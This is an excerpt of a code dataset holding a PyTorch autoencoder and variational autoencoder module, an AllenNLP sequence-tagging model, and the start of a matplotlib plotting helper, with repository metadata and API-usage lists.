stride=(2, 2)), # 14x14\n nn.ReLU(inplace=True),\n nn.Conv2d(8, 16, 3, padding=1, stride=(2, 2)), # 7x7\n nn.ReLU(inplace=True), # 64x4x4\n nn.Conv2d(16, 32, 3, padding=1, stride=(2, 2)), # 4x4\n nn.ReLU(inplace=True), # 64x4x4\n nn.Flatten(),\n nn.Linear(32 * 16, 8 * 16),\n nn.ReLU(inplace=True),\n nn.Linear(8 * 16, n_bottleneck),\n nn.ReLU(inplace=True),\n ]\n decoder_layers = [\n nn.Linear(n_bottleneck, 8 * 16),\n nn.ReLU(inplace=True),\n nn.Linear(8 * 16, 32 * 16),\n nn.ReLU(inplace=True),\n Reshape(-1, 32, 4, 4),\n nn.ConvTranspose2d(32, 16, 3, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(16, 8, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(8, n_channel, 4, stride=2, padding=1),\n nn.Sigmoid(),\n ]\n return encoder_layers, decoder_layers\n\n\nclass AutoEncoderBase(ModelBase[AutoEncoderConfig], Generic[ImageT]):\n image_type: Type[ImageT]\n encoder_module: nn.Module\n decoder_module: nn.Module\n n_pixel: int\n\n @abstractmethod\n def loss(self, sample: torch.Tensor) -> LossDict:\n pass\n\n @abstractmethod\n def encode(self, inp: torch.Tensor) -> torch.Tensor:\n \"\"\"Must be deterministic\"\"\"\n\n @abstractmethod\n def decode(self, inp: torch.Tensor) -> torch.Tensor:\n \"\"\"Must be deterministic\"\"\"\n\n @abstractmethod\n def compute_reconstruction_loss(self, img: ImageT) -> float:\n \"\"\"Must be deterministic\"\"\"\n\n def check_network_input(self, inp: torch.Tensor):\n assert inp.ndim == 4\n assert 
list(inp.shape[2:]) == [self.n_pixel, self.n_pixel]\n assert self.image_type.channel() == inp.shape[1], \"channel mismatch\"\n\n def forward(self, input: torch.Tensor) -> torch.Tensor:\n self.check_network_input(input)\n return self.decode(self.encode(input))\n\n def channel(self) -> int:\n return self.image_type.channel()\n\n\nclass AutoEncoder(AutoEncoderBase[ImageT]):\n def loss(self, sample: torch.Tensor) -> LossDict:\n self.check_network_input(sample)\n f_loss = nn.MSELoss()\n reconstructed = self.forward(sample)\n loss_value = f_loss(sample, reconstructed)\n return LossDict({\"reconstruction\": loss_value})\n\n def encode(self, inp: torch.Tensor) -> torch.Tensor:\n return self.encoder_module(inp)\n\n def decode(self, inp: torch.Tensor) -> torch.Tensor:\n return self.decoder_module(inp)\n\n def compute_reconstruction_loss(self, img: ImageT) -> float:\n tens = img.to_tensor().unsqueeze(dim=0)\n tens_reconst = nn.Sequential(self.encoder_module, self.decoder_module)(tens)\n loss = nn.MSELoss()(tens_reconst, tens)\n return loss.item()\n\n def _setup_from_config(self, config: AutoEncoderConfig):\n self.image_type = config.image_type # type: ignore\n n_pixel = config.n_pixel\n self.n_pixel = n_pixel\n encoder_layers, decoder_layers = create_encoder_decoder_layers(\n self.channel(), config.n_pixel, config.n_bottleneck\n )\n self.encoder_module = nn.Sequential(*encoder_layers)\n self.decoder_module = nn.Sequential(*decoder_layers)\n\n\nclass VariationalAutoEncoder(AutoEncoderBase[ImageT]):\n dense_mean: nn.Module\n dense_var: nn.Module\n\n def loss(self, sample: torch.Tensor) -> LossDict:\n self.check_network_input(sample)\n\n encoded = self.encoder_module(sample)\n mu = self.dense_mean(encoded)\n logvar = self.dense_var(encoded)\n z = self.reparameterize(mu, logvar)\n reconstructed = self.decoder_module(z)\n\n weight = 1e-1 * self.config.n_bottleneck / np.prod(sample.shape)\n kld_loss = (\n torch.mean(-0.5 * torch.sum(1 + logvar - mu**2 - logvar.exp(), dim=1), dim=0) * weight\n )\n loss_value = nn.MSELoss()(sample, reconstructed)\n return LossDict({\"reconstruction\": loss_value, \"kld\": kld_loss})\n\n def encode(self, input: torch.Tensor) -> torch.Tensor:\n return nn.Sequential(self.encoder_module, self.dense_mean)(input)\n\n def decode(self, input: torch.Tensor) -> torch.Tensor:\n return self.decoder_module(input)\n\n def compute_reconstruction_loss(self, img: ImageT) -> float:\n tens = img.to_tensor().unsqueeze(dim=0)\n tens_reconst = nn.Sequential(self.encoder_module, self.dense_mean, self.decoder_module)(\n tens\n )\n loss = nn.MSELoss()(tens_reconst, tens)\n return loss.item()\n\n def reparameterize(self, mu: torch.Tensor, logvar: torch.Tensor) -> torch.Tensor:\n std = torch.exp(0.5 * logvar)\n eps = torch.randn_like(std)\n return eps * std + mu\n\n def _setup_from_config(self, config: AutoEncoderConfig):\n self.image_type = config.image_type # type: ignore\n n_pixel = config.n_pixel\n encoder_layers, decoder_layers = create_encoder_decoder_layers(\n self.channel(), config.n_pixel, config.n_bottleneck\n )\n encoder_layers.pop() # remove relu\n encoder_layers.pop() # remove dense\n\n encoder_last_dense: nn.Linear = encoder_layers[-2] # type: ignore\n out_dim = encoder_last_dense.out_features\n\n self.encoder_module = nn.Sequential(*encoder_layers)\n self.decoder_module = nn.Sequential(*decoder_layers)\n self.dense_mean = nn.Linear(out_dim, config.n_bottleneck)\n self.dense_var = nn.Linear(out_dim, config.n_bottleneck)\n self.n_pixel = n_pixel\n\n def get_latent_axis_images(\n self, 
axis: int, b_min: float = -2.0, b_max: float = 2.0, n_sample: int = 20\n ) -> List[ImageT]:\n # create samples from latent space walking through an axis\n samples = torch.zeros(n_sample, self.config.n_bottleneck)\n for i, val in enumerate(np.linspace(b_min, b_max, n_sample)):\n samples[i, axis] = val\n\n # create images\n tensor_images = self.decoder_module(samples)\n images = [self.image_type.from_tensor(tensor_image) for tensor_image in tensor_images]\n return images\n", "repo_name": "HiroIshida/mohou", "sub_path": "mohou/model/autoencoder.py", "file_name": "autoencoder.py", "file_ext": "py", "file_size_in_byte": 10331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "61", "api": [{"api_name": "mohou.model.common.ModelConfigBase", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 15, "usage_type": "name"}, {"api_name": "mohou.types.ImageBase", "line_number": 15, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 56, "usage_type": "call"}, {"api_name": 
"torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 87, "usage_type": "call"}, 
{"api_name": "torch.nn", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 96, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 97, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 98, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 115, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 117, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 
118, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 119, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 128, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 133, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 135, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 136, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "mohou.model.common.ModelBase", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Generic", "line_number": 142, "usage_type": "name"}, {"api_name": "mohou.types.ImageT", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 143, "usage_type": "name"}, {"api_name": "mohou.types.ImageT", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 144, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 145, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 145, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 149, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 148, "usage_type": "name"}, {"api_name": 
"mohou.model.common.LossDict", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 153, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 152, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 157, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 156, "usage_type": "name"}, {"api_name": "mohou.types.ImageT", "line_number": 161, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 169, "usage_type": "attribute"}, {"api_name": "mohou.types.ImageT", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 178, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 180, "usage_type": "name"}, {"api_name": "mohou.model.common.LossDict", "line_number": 183, "usage_type": "call"}, {"api_name": "mohou.model.common.LossDict", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 185, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 188, "usage_type": "attribute"}, {"api_name": "mohou.types.ImageT", "line_number": 191, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 193, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 194, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 205, "usage_type": "name"}, {"api_name": "mohou.types.ImageT", "line_number": 208, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 209, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 210, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 210, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 212, "usage_type": "attribute"}, {"api_name": "numpy.prod", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 225, "usage_type": "name"}, {"api_name": "mohou.model.common.LossDict", "line_number": 226, "usage_type": "call"}, {"api_name": "mohou.model.common.LossDict", "line_number": 212, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 228, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 229, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 229, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 231, "usage_type": "attribute"}, {"api_name": "mohou.types.ImageT", "line_number": 234, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 239, "usage_type": 
"call"}, {"api_name": "torch.nn", "line_number": 239, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 242, "usage_type": "attribute"}, {"api_name": "torch.exp", "line_number": 243, "usage_type": "call"}, {"api_name": "torch.randn_like", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 256, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 256, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 260, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 261, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 262, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 270, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 267, "usage_type": "name"}, {"api_name": "mohou.types.ImageT", "line_number": 267, "usage_type": "name"}]} +{"seq_id": "35802112679", "text": "\nfrom typing import Dict\n\nimport torch\nfrom torch.nn import CrossEntropyLoss\nfrom torch.nn import Sequential\nfrom torch import nn\n\n\nfrom allennlp.models import Model\nfrom allennlp.data.vocabulary import Vocabulary\nfrom allennlp.modules.text_field_embedders import TextFieldEmbedder\nfrom allennlp.modules.seq2seq_encoders import Seq2SeqEncoder\nfrom allennlp.nn.util import get_text_field_mask\nfrom allennlp.training.metrics import CategoricalAccuracy\nfrom metrics.loss import SequenceLoss\nfrom torch.nn import SmoothL1Loss, HingeEmbeddingLoss, CrossEntropyLoss\nfrom metrics.confidence import Confidence\nfrom allennlp.nn.util import sequence_cross_entropy_with_logits\n\n\n@Model.register(\"tagger\")\nclass BaseSequenceTagger(Model):\n \"\"\"\n a model for sequence tagging\n \"\"\"\n\n def __init__(self,\n word_embeddings: TextFieldEmbedder,\n encoder: Seq2SeqEncoder,\n vocab: Vocabulary,\n dropout: float = 0.5\n ) -> None:\n \"\"\"\n\n :param word_embeddings: the embeddings to start with\n :param encoder: the seq2seq transformer of embeddings can be LSTM for example\n :param vocab: dataset input and output vocabulary\n \"\"\"\n\n super(BaseSequenceTagger, self).__init__(vocab)\n\n self.word_embeddings = word_embeddings\n\n self.encoder = encoder\n\n # Representations this is the layer that is just above the last layer and the non linearity (hidden[-1])\n # is is used to calculate FID score, and similar metrics that's why we expose it into self.representations\n # class attribute\n self.representations = self.encoder\n\n self.hidden2tags = torch.nn.Linear(in_features=encoder.get_output_dim(),\n out_features=vocab.get_vocab_size('pos'))\n\n # self.accuracy = CategoricalAccuracy()\n self.criterion = sequence_cross_entropy_with_logits\n\n self.metrics = {\n \"accuracy\": CategoricalAccuracy(),\n # \"huber-loss\": Loss(SmoothL1Loss()),\n \"confidence\": Confidence()\n }\n\n self.dropout = nn.Dropout(dropout)\n\n def forward(self,\n sentence: Dict[str, torch.Tensor],\n label: torch.Tensor = None, **kwargs) -> Dict[str, torch.Tensor]:\n\n words = sentence\n mask = get_text_field_mask(words)\n\n embeddings = self.word_embeddings(words)\n encoder_out = 
self.encoder(embeddings, mask)\n logits = self.hidden2tags(self.dropout(encoder_out))\n\n output = {\"logits\": logits,\n \"probs\": torch.nn.functional.softmax(logits, dim=-1),\n \"class\": torch.argmax(torch.nn.functional.softmax(logits, dim=-1), dim=-1)\n }\n\n if label is not None:\n\n output[\"loss\"] = self.criterion(logits, label,\n weights=torch.ones_like(label))\n\n for metric_name, metric in self.metrics.items():\n\n metric(logits, label)\n\n return output\n\n def get_metrics(self, reset: bool = False) -> Dict[str, float]:\n\n metrics = {}\n\n for metric_name, metric in self.metrics.items():\n\n metrics[metric_name] = metric.get_metric(reset)\n\n return metrics\n", "repo_name": "naver/domainshift-prediction", "sub_path": "models/base/basetagger.py", "file_name": "basetagger.py", "file_ext": "py", "file_size_in_byte": 3299, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "61", "api": [{"api_name": "allennlp.models.Model", "line_number": 23, "usage_type": "name"}, {"api_name": "allennlp.modules.text_field_embedders.TextFieldEmbedder", "line_number": 29, "usage_type": "name"}, {"api_name": "allennlp.modules.seq2seq_encoders.Seq2SeqEncoder", "line_number": 30, "usage_type": "name"}, {"api_name": "allennlp.data.vocabulary.Vocabulary", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "attribute"}, {"api_name": "allennlp.nn.util.sequence_cross_entropy_with_logits", "line_number": 56, "usage_type": "name"}, {"api_name": "allennlp.training.metrics.CategoricalAccuracy", "line_number": 59, "usage_type": "call"}, {"api_name": "metrics.confidence.Confidence", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 68, "usage_type": "attribute"}, {"api_name": "allennlp.nn.util.get_text_field_mask", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.ones_like", "line_number": 85, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 68, "usage_type": "name"}, {"api_name": "metrics.loss", "line_number": 95, "usage_type": "name"}, {"api_name": "metrics.loss", "line_number": 99, "usage_type": "name"}, {"api_name": "metrics.loss", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 93, "usage_type": "name"}, {"api_name": "allennlp.models.Model.register", "line_number": 22, "usage_type": "call"}, {"api_name": "allennlp.models.Model", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "25986663268", "text": "from __future__ import print_function, division\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\ndef tableau20_colors():\n \"\"\"Good set of colors for 
plotting\n\n Returns:\n list: list of r,g,b color values\n \"\"\"\n tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),\n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),\n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),\n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),\n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]\n for i in range(len(tableau20)):\n r, g, b = tableau20[i]\n tableau20[i] = (r / 255., g / 255., b / 255.)\n\n return tableau20\n\n\ndef my_hist(ax, data, bins=None, horizontal=False):\n \"\"\"Custom histogram function for plotting multinest output\n\n Args:\n ax (matplotlib.axes.Axes): axes to plot with\n data (np.ndarray): array of values to histogram\n bins (int, optional): number of bins in histogram\n horizontal (bool): histogram is horizontal if True\n\n Returns:\n np.ndarray: bin edges for the histogram\n \"\"\"\n if bins is not None:\n hist, bins = 